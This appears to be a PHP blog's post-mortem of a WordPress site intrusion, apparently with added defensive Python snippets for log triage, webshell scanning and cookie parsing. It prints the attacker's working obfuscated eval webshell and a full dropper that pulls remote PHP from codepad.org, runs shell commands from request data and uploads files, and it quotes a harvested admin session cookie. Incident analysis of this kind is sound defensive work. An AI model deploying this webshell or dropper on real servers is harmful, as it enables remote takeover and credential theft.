安静
PHP tech blog

151110 Server Intrusion Post-mortem

Attackers on the internet are getting more and more professional: they mine data and trace history as far as they can to find your weak spot. Caoliu a couple of days ago, NetEase a while before that; in short, anyone on the internet gets cut sooner or later. Enough chatter, on to the article.

Rough sequence of events:

The attacker took an email account from the NetEase password leak, read through the related mail, learned that a certain site existed, reset its password, logged into the admin backend, uploaded a plugin, and activated the trojan.

Takeaway:

Every major incident on the internet can in fact be closely connected to you.

A little after 14:00 I got an SMS from Aliyun saying the server had a trojan and that it had been quarantined, so I logged into Aliyun to take a look.

Trojan file:

wp-includes/media-bak.php

Its creation time was 14:10.

Trojan contents:

    $qV = "stop_";
    // $qV[4].$qV[3].$qV[2].$qV[0].$qV[1] spells "_post"; strtoupper() turns it into "_POST"
    $s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
    if (isset(${$s20}['dak'])) {   // ${$s20} is the variable-variable $_POST
        eval(${$s20}['dak']);
    }

    // one-line webshell: eval($_POST['dak'])

Searching the access log for hits on the trojan file shows the attacker's related activity:

    cat www.80aj.com.log | grep '10/Nov/2015' | grep php | grep 200 | awk '{print $1"\t"$4$5"\t"$9"\t"$6"\t"$7}' | grep php 

    173.252.193.210 [10/Nov/2015:14:09:59+0800] 200 "GET    /wp-login.php?redirect_to=http%3A%2F%2Fwww.80aj.com%2Fwp-admin%2F&reauth=1
    173.252.193.210 [10/Nov/2015:14:10:01+0800] 200 "GET    /wp-admin/plugin-install.php?tab=upload
    173.252.193.210 [10/Nov/2015:14:10:04+0800] 200 "POST   /wp-admin/update.php?action=upload-plugin
    173.252.193.210 [10/Nov/2015:14:10:05+0800] 200 "GET    /wp-content/uploads/2015/11/1447135650.php?test=1
    173.252.193.210 [10/Nov/2015:14:10:05+0800] 200 "POST   /wp-content/uploads/2015/11/1447135650.php
    173.252.193.210 [10/Nov/2015:14:10:06+0800] 200 "POST   /wp-includes/media-bak.php
    173.252.193.210 [10/Nov/2015:14:10:07+0800] 200 "GET    /wp-includes/class-wp-upgrade.php
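As an added example (not from the post), a small Python detector that reads lines in the layout the awk command above prints and flags the two things this timeline shows: PHP being served from wp-content/uploads, and direct hits on wp-includes/*.php, each correlated with a preceding plugin-upload POST from the same client IP. The sample lines are constructed with documentation IP addresses.

```python
import re
from datetime import datetime, timedelta
# Constructed sample lines in the layout the awk command above prints
# (client IP, timestamp, status, method, path); IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 [10/Nov/2015:14:09:59+0800] 200 "GET /wp-login.php?redirect_to=%2Fwp-admin%2F&reauth=1
203.0.113.7 [10/Nov/2015:14:10:01+0800] 200 "GET /wp-admin/plugin-install.php?tab=upload
203.0.113.7 [10/Nov/2015:14:10:04+0800] 200 "POST /wp-admin/update.php?action=upload-plugin
203.0.113.7 [10/Nov/2015:14:10:05+0800] 200 "GET /wp-content/uploads/2015/11/1447135650.php?test=1
203.0.113.7 [10/Nov/2015:14:10:06+0800] 200 "POST /wp-includes/media-bak.php
198.51.100.9 [10/Nov/2015:15:02:11+0800] 200 "GET /wp-content/uploads/2015/11/photo.jpg
"""
LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] (\d{3}) "(\w+)\s+(\S+)')
UPLOADS_PHP = re.compile(r'^/wp-content/uploads/.*\.php(\?|$)')
INCLUDES_PHP = re.compile(r'^/wp-includes/[^?]*\.php(\?|$)')
WINDOW = timedelta(minutes=5)   # correlate with plugin uploads this recent

def parse(log_text):
    """Yield (ip, datetime, status, method, path) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, status, method, path = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S%z"), int(status), method, path

def find_suspicious(log_text):
    """Return (ip, path, reason) findings, in log order."""
    findings = []
    last_plugin_upload = {}   # ip -> time of its most recent plugin-upload POST
    for ip, when, status, method, path in parse(log_text):
        if method == "POST" and path.startswith("/wp-admin/update.php?action=upload-plugin"):
            last_plugin_upload[ip] = when
            continue
        if status != 200:
            continue
        if UPLOADS_PHP.match(path):
            # PHP must never execute under uploads/; a 200 means the server is not blocking it.
            reason = "php executed under wp-content/uploads"
        elif INCLUDES_PHP.match(path):
            # Browsers do not request wp-includes/*.php directly in normal use;
            # check any such file against a clean WordPress checkout.
            reason = "direct hit on wp-includes/*.php"
        else:
            continue
        uploaded = last_plugin_upload.get(ip)
        if uploaded is not None and when - uploaded <= WINDOW:
            reason += " %ds after a plugin upload by the same IP" % (when - uploaded).seconds
        findings.append((ip, path, reason))
    return findings
```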

Going into wp-content/uploads/2015/11/ I found the file xx.php. Roughly, its idea is: when an incoming request carries test, it actively downloads 3 files into the wp-includes directory, with content pulled from codepad.org, an online code-testing site.

    if(isset($_GET['test']) && $_GET['test']){
        echo 261000;
    //    $PHP_SELF = basename(__FILE__);
    //    rename($PHP_SELF,'new_'.$PHP_SELF);
    }elseif(isset($_GET['info']) && $_GET['info']){
        echo phpinfo();
    }elseif(isset($_GET['eval']) && $_GET['eval']){
        $qV = "stop_";
        $s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
        if (isset(${$s20}['dak'])) {
            eval(${$s20}['dak']);
        }
    }elseif(isset($_GET['go']) && $_GET['go']){
        $n = substr_count(substr(dirname(__FILE__),intval(strpos(dirname(__FILE__),'wp-content'))), "/");
        $path_pre = str_repeat('../',$n+1);
        $in_path = $path_pre.'wp-includes/';
        if(@file_put_contents($in_path.'media-bak.php',@file_get_contents('http://codepad.org/Uk6hqTZe/raw.php'))){
            echo '|YS[dak]';
        }else{
            echo '|YF';
        }
        if(@file_put_contents($in_path.'class-wp-upgrade.php',@file_get_contents('http://codepad.org/v6xhqhy7/raw.php'))){
            echo '|DS[wso]';
        }else{
            echo '|DF';
        }
        if(@file_put_contents($in_path.'class-wp-upload.php',@file_get_contents('http://codepad.org/ZSvhCPZE/raw.php'))){
            echo '|XS';
        }else{
            echo '|XF';
        }
    }else{
        $path = isset($_POST['path'])?$_POST['path']:dirname(__FILE__);
        if($_POST['url']){
            foreach($_POST['url'] as $url){
                $filename = $url['name'];
    //            $link = $url['link'];
                $con = $url['con'];
                if($a = @file_put_contents($path.$filename,base64_decode($con))){
                    echo '|'.$filename.' success';
                }else{
                    if($a = @file_put_contents($filename,base64_decode($con))){
                        echo '|ThisPath-'.$filename.' success';
                    }else{
                        echo '|'.$filename.' fail';
                    }
    //                echo '|'.$filename.' fail';
                }
            }
            $PHP_SELF = basename(__FILE__);
            rename($PHP_SELF,'new_up.php');
        }else{
            $c=$_GET['cmd'];
            system($c);
            $p=$_SERVER["DOCUMENT_ROOT"];
            $yoco=dirname(__FILE__);
            echo <<<HTML
        <form enctype="multipart/form-data"  method="POST">
        Path:$p<br>
        <input name="file" type="file"><br>
        Directory:<br>
        <input size="48" value="$yoco/" name="pt" type="text"><br>
        <input type="submit" value="Upload">
        $tend
    HTML;
            if (isset($_POST["pt"])){
                $uploadfile = $_POST["pt"].$_FILES["file"]["name"];
                if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
                if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
                    echo "uploaded:$uploadfile\n";
                    echo "Size:".$_FILES["file"]["size"]."\n";
                }else {
                    print "Error:\n";
                }
            }
        }
    }
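Added example, not code from the post: a static triage scanner in Python for the indicators the one-liner above and this dropper share, namely eval() on a variable-variable, a superglobal name rebuilt character by character from a literal (the "stop_" trick, which it decodes to _POST), a remote URL written straight to disk, and a shell call fed from request data. The three PHP samples are constructed; the benign one shows that plain file_put_contents use is not flagged.

```python
import re
# Constructed PHP samples (not files from the compromised site): the obfuscated
# one-liner quoted in the post, a cut-down dropper, and a benign cache writer.
WEBSHELL = '''<?php
$qV = "stop_";
$s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
if (isset(${$s20}['dak'])) { eval(${$s20}['dak']); }'''
DROPPER = '''<?php
@file_put_contents($p.'media-bak.php', @file_get_contents('http://example.invalid/raw.php'));
$c = $_GET['cmd']; system($c);'''
BENIGN = '''<?php
file_put_contents(__DIR__ . '/cache.log', date('c') . " cache rebuilt\\n", FILE_APPEND);'''
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_SERVER", "_FILES"}
STR_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')            # $qV = "stop_";
INDEX_CONCAT = re.compile(r'(?:\$\w+\[\d+\]\s*\.\s*)+\$\w+\[\d+\]')  # $qV[4] . $qV[3] ...
TAINT_ASSIGN = re.compile(r'\$(\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\b')
SHELL_CALL = re.compile(r'\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$(\w+)')
PATTERNS = [
    ("eval() on a variable-variable (hidden superglobal)", r'eval\s*\(\s*\$\{\s*\$'),
    ("remote URL fetched and written to disk",
     r'file_put_contents\s*\(.*file_get_contents\s*\(\s*[\'"]https?://'),
]

def rebuilt_strings(src):
    """Decode strings assembled from indexed characters of a literal ("stop_" -> "_POST")."""
    literals = dict(STR_ASSIGN.findall(src))
    found = []
    for m in INDEX_CONCAT.finditer(src):
        parts = re.findall(r'\$(\w+)\[(\d+)\]', m.group(0))
        try:
            s = "".join(literals[name][int(i)] for name, i in parts)
        except (KeyError, IndexError):
            continue  # indexes a variable that is not a literal we can resolve
        if re.search(r'strtoupper\s*\(\s*$', src[:m.start()]):  # strtoupper(...) wrapper
            s = s.upper()
        found.append(s)
    return found

def scan(src):
    """Return the reasons a PHP source text looks like a webshell or dropper ([] if clean)."""
    reasons = [name for name, pat in PATTERNS if re.search(pat, src)]
    for s in rebuilt_strings(src):
        if s in SUPERGLOBALS:
            reasons.append("superglobal name %s rebuilt character by character" % s)
    tainted = set(TAINT_ASSIGN.findall(src)) | SUPERGLOBALS
    for var in SHELL_CALL.findall(src):
        if var in tainted:
            reasons.append("shell command taken from request data via $%s" % var)
    return reasons
```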

Next, class-wp-upgrade.php collects the various cookies from user requests and, disguised as an error_log, keeps harvesting more cookies.

One of the entries in it was:

    ["wordpress_logged_in_42b76570a501a4b13a26d8fda417c568"]=>
      string(126) "weiwei|1447308597|3pnLyBYybwZbhNuW2eIegvzYJz79s2rkZx4zaIm7PTq|d667fceecc9ab854fffa28bcb8cde9ea3eca0e38c421becee0f7dba0cc8899bf"

This was the account of a colleague from years ago, and it had admin rights: xxx@126.com. Just so-so, too funny. Jing Ke assassinates the King of Qin.
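Added example, not part of the post: parsing the stolen wordpress_logged_in value to see whose session it is and when it was issued, assuming WordPress's default 2-day cookie lifetime (14 days with "remember me", and the auth_cookie_expiration filter can change both).

```python
from datetime import datetime, timedelta, timezone

# Value quoted in the post. Layout: <login>|<expiry unix time>|<session token>|<hmac>.
STOLEN = ("weiwei|1447308597|3pnLyBYybwZbhNuW2eIegvzYJz79s2rkZx4zaIm7PTq|"
          "d667fceecc9ab854fffa28bcb8cde9ea3eca0e38c421becee0f7dba0cc8899bf")
CST = timezone(timedelta(hours=8))   # the log excerpt above is in +0800

def parse_auth_cookie(value, remember_me=False, tz=CST):
    """Split a wordpress_logged_in_* value and derive when it was issued.
    By default WordPress sets expiry = issue time + 2 days, or + 14 days when
    "remember me" was ticked, so issue time = expiry - lifetime."""
    login, expiry, token, hmac = value.split("|")
    expires = datetime.fromtimestamp(int(expiry), tz)
    lifetime = timedelta(days=14 if remember_me else 2)
    return {"login": login, "expires": expires, "issued": expires - lifetime,
            "token": token, "hmac": hmac}

def valid_at(value, when_epoch, remember_me=False):
    """True if the cookie's own expiry has not passed at unix time `when_epoch`.
    The server can still reject it earlier: the HMAC covers a fragment of the
    user's password hash and the session token, so resetting the password or
    destroying the user's sessions invalidates it before this date."""
    return when_epoch < int(parse_auth_cookie(value, remember_me)["expires"].timestamp())

if __name__ == "__main__":
    info = parse_auth_cookie(STOLEN)
    print(info["login"], "issued", info["issued"].isoformat(), "expires", info["expires"].isoformat())
```

For the value above this gives an issue time of 2015-11-10 14:09:57 +0800, within seconds of the first wp-login.php hit in the log excerpt.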

Reproduction without permission is prohibited: AJ's Blog » 151110 Server Intrusion Post-mortem